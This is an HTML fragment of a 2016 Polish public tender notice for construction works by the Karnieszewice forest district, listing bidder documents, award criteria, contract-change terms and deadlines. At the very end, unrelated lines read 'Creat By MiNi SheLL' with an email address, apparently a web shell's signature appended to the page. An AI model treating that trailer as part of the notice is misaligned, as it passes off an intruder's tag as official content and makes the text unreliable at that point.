</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin zakończenia: do 25 tygodni od zawarcia umowy (nie później jednak jak na dzień 12 grudnia 2016 r.) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących zakresach:
1. Zamawiający przewiduje możliwość zmiany ceny ofertowej:
a) w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki,
b) w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym,
2. Zamawiający przewiduje możliwość zmiany terminu wykonania zamówienia:
a) przypadku udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego w oparciu o art. 67 ust. 1 ustawy PZP, jeśli jego wykonanie (sposób, technologia) będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego; 
b) w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia
c) jeżeli w czasie obowiązywania umowy wystąpią wybitnie niesprzyjające warunki pogodowe uniemożliwiające realizację zadania np.: długotrwałe opady atmosferyczne, 
d) przypadku zaistnienia okoliczności niezależnych od Wykonawcy                   a w szczególności w przypadku istotnych błędów w dokumentacji projektowej, kolizji z niezinwentaryzowanymi sieciami podziemnymi, konieczności prowadzenia prac wykopaliskowych itp.
3. W przypadku powyższych okoliczności może nastąpić zmiana terminu zakończenia robót lub wynagrodzenia należnego Wykonawcy. 
4. Nowy termin wykonania zamówienia ustali Zamawiający po negocjacjach     z Wykonawcą.
5. Zamawiający w razie wstrzymania robót z przyczyn, za które wykonawca nie odpowiada, obowiązany jest do:
a) dokonania odbioru robót przerwanych oraz do zapłaty wynagrodzenia za roboty, które zostały wykonane do dnia odstąpienia,
b) przejęcie od Wykonawcy terenu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_karnieszewice/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Karnieszewice
Trawica 8a
76-004 Sianów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2016 godzina 10:30, miejsce: Nadleśnictwo Karnieszewice
Trawica 8a
76-004 Sianów
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com